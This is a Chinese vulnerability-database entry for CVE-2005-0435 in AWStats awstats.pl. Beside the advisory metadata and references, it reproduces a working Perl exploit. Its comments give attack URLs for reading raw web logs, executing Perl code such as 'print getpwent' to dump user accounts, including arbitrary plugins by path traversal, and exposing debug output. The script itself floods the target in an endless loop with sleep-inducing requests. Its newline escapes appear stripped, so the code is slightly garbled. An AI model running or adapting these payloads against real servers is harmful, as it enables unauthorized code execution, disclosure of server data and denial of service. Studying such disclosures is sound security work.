AWStats awstats.pl 信息泄露漏洞

AWStats awstats.pl 信息泄露漏洞

漏洞ID 1108458 漏洞类型 未知
发布时间 2005-02-14 更新时间 2005-05-02
图片[1]-AWStats awstats.pl 信息泄露漏洞-安全小百科CVE编号 CVE-2005-0435
图片[2]-AWStats awstats.pl 信息泄露漏洞-安全小百科CNNVD-ID CNNVD-200505-303
漏洞平台 CGI CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/817
https://www.securityfocus.com/bid/90266
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-303
|漏洞详情
AWStats6.3和6.4的awstats.pl允许远程攻击者通过向rawlog设置loadplugin和pluginmode参数来读取服务器Web日志文件。
|漏洞EXP
#!/usr/bin/perl
# 
# 
# Summarized the advisory www.ghc.ru GHC: /str0ke
#											
# [0] Exploitable example (raw log plugin):						
#    Attacker can read sensitive information						
#											
# http://server/cgi-bin/awstats-6.4/awstats.pl?pluginmode=rawlog&loadplugin=rawlog	
#											
# [1] Perl code execution. (This script)						
#											
# http://server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent		
#											
# [2] Arbitrary plugin including.							
# 											
# http://server/cgi-bin/awstats-6.4/awstats.pl?&loadplugin=../../../../usr/libdata/perl/5.00503/blib
#											
# [3] Sensetive information leak in AWStats version 6.3(Stable) - 6.4(Development).	
#    Every user can access debug function:						
#											
# http://server/cgi-bin/awstats-6.4/awstats.pl?debug=1					
# http://server/cgi-bin/awstats-6.4/awstats.pl?debug=2                                  
#											
# Be sure to change the $server + /cgi-bin location /str0ke				
#											

use IO::Socket;
$server = 'www.example.com';
sub ConnectServer {
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80")
|| die "Errorn";
print $socket "GET /cgi-bin/awstats-6.4/awstats.pl?&hack=$rp&PluginMode=:sleep HTTP/1.1n";
print $socket "Host: $servern";
print $socket "Accept: */*n";
print $socket "nn";
}

while () {
$rp = rand;
&ConnectServer;
}

# milw0rm.com [2005-02-14]
|受影响的产品
AWStats AWStats 6.4

AWStats AWStats 6.3

|参考资料

来源:SECUNIA
名称:14299
链接:http://secunia.com/advisories/14299
来源:XF
名称:awstats-awstatpl-obtain-information(19333)
链接:http://xforce.iss.net/xforce/xfdb/19333
来源:BUGTRAQ
名称:20050214AWStats<=6.4Multiplevulnerabilities
链接:http://www.securityfocus.com/archive/1/390368

相关推荐: New Media Generation Hired Team: Trial Multiple Remote Vulnerabilities

New Media Generation Hired Team: Trial Multiple Remote Vulnerabilities 漏洞ID 1097657 漏洞类型 Input Validation Error 发布时间 2004-11-15 更新…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享